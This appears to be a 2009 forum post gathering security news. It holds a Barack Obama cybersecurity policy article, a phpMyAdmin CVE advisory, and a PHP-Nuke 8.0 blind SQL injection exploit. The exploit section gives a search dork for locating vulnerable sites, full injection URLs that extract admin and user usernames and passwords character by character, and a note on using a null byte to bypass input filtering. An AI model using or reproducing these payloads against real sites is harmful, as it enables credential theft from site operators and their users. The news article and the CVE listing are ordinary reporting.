Security Subscription

[paxnWo]

Security Subscription

#23.01.2009

#3:

#############
#### PHP-Nuke 8.0 Downloads Blind Sql Injection ####
########################################################################
#############
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
########################################################################
#############
# #
#Download : http://phpnuke.org #
# #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #
# #
########################################################################
#############
# [Bug] #
# #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip
tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring(
(select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip
tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring(
(select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip
tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring(
(select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&descrip
tion=1&email=attacker (at) devil (dot) net [email concealed]&&url=0%2F*%00*/'%20OR%20ascii(substring(
(select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F
*
# #
########################################################################
#############
# [Note] #
# #
#1. magic_quotes_gpc = Off #
#2. register_globals = On #
#3. For using bug you must login via a simple user. #
#4. After using bug go to this url : #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker
@devil.net&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function #
# please don't change ascii code and %00. #
# #
###################################### TNX GOD ######################################

########################################################################

#2:

In the homeland security document, [URL="http://www.whitehouse.gov/agenda/homeland_security/"]published on Thursday[/URL], the administration pledged to create a top cybersecurity position, harden the nation's infrastructure, fund research and development of secure computing technologies, and work with the private sector to set standards from cybersecurity. The document also promised that the administration will work with industry to develop better defenses against cyber espionage, shut down the mechanisms through which online criminals profit from their crimes, and mandate better privacy and breach disclosures.
The Obama administration will "declare the cyber infrastructure a strategic asset and establish the position of national cyber advisor who will report directly to the president and will be responsible for coordinating federal agency efforts and development of national cyber policy," the document stated.
Much of the strategy mirrors the recommendations sent to the administration by a group of industry, government and academic experts in cybersecurity. The [URL="http://www.securityfocus.com/news/11540"]94-page report on those recommendations[/URL], penned by the Commission on Cybersecurity for the 44th Presidency, stressed that the current U.S. administration needs to treat incursions into the nation's networks as a serious problem, akin to nuclear non-proliferation and combatting terrorism. Indeed, the homeland security document puts cybersecurity as the fourth priority for the administration's security strategy, behind fighting terrorism, limiting the spread of nuclear weapon and preventing bio-weapon attacks and epidemics.
Only late in the previous administration, under former President George W. Bush, did the government make progress in establishing better security for government systems. Years of poor grades under the Federal Information Security Management Act (FISMA) [URL="http://www.securityfocus.com/brief/741"]did little to improve[/URL] information-technology security within federal agencies. Not until major attacks on government networks [URL="http://www.securityfocus.com/news/11472"]resulted in congressional hearings[/URL] did the administration take point on efforts to lock down computers. In 2007, the Bush Administration [URL="http://www.securityfocus.com/news/11505"]launched[/URL] the Federal Desktop Core Configuration program and the Trusted Internet Connection initiative, and last year, President Bush signed the National Security Presidential Directive 54/Homeland Security Presidential Directive 23 [URL="http://www.securityfocus.com/news/11507"]creating the Comprehensive National Cybersecurity Initiative (CNCI)[/URL].
With the push for better cybersecurity, President Obama made good on campaign promises made last summer.
"As President, I'll make cyber security the top priority that it should be in the 21st century," he told people in West Lafayette, Ind., [URL="http://www.barackobama.com/2008/07/16/remarks_of_senator_barack_obam_95.php"]according to a transcript[/URL]. "I'll declare our cyber-infrastructure a strategic asset, and appoint a National Cyber Advisor who will report directly to me. We'll coordinate efforts across the federal government, implement a truly national cyber-security policy, and tighten standards to secure information — from the networks that power the federal government, to the networks that you use in your personal lives."

Two days into his administration, U.S. President Barack Obama issued a statement outlining his homeland security policy, including the creation of a top advisor in the White House to set cybersecurity policy.

#1:

Date : January 23, 2009
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows
remote attackers to inject arbitrary web script or HTML by
using db script parameter when register_global php parameter is
enabled (CVE-2008-4775).

Cross-site request forgery (CSRF) vulnerability in tbl_structure.php
allows remote attackers perform SQL injection and execute arbitrary
code by using table script parameter (CVE-2008-5621).

Multiple cross-site request forgery (CSRF) vulnerabilities in allows
remote attackers perform SQL injection by using unknown vectors
related to table script parameter (CVE-2008-5622).

Package : phpMyAdmin

O sa imi updatez constant postul sa adaug noi informatii. Nu postati dupa mine, doar daca simtiti nevoia.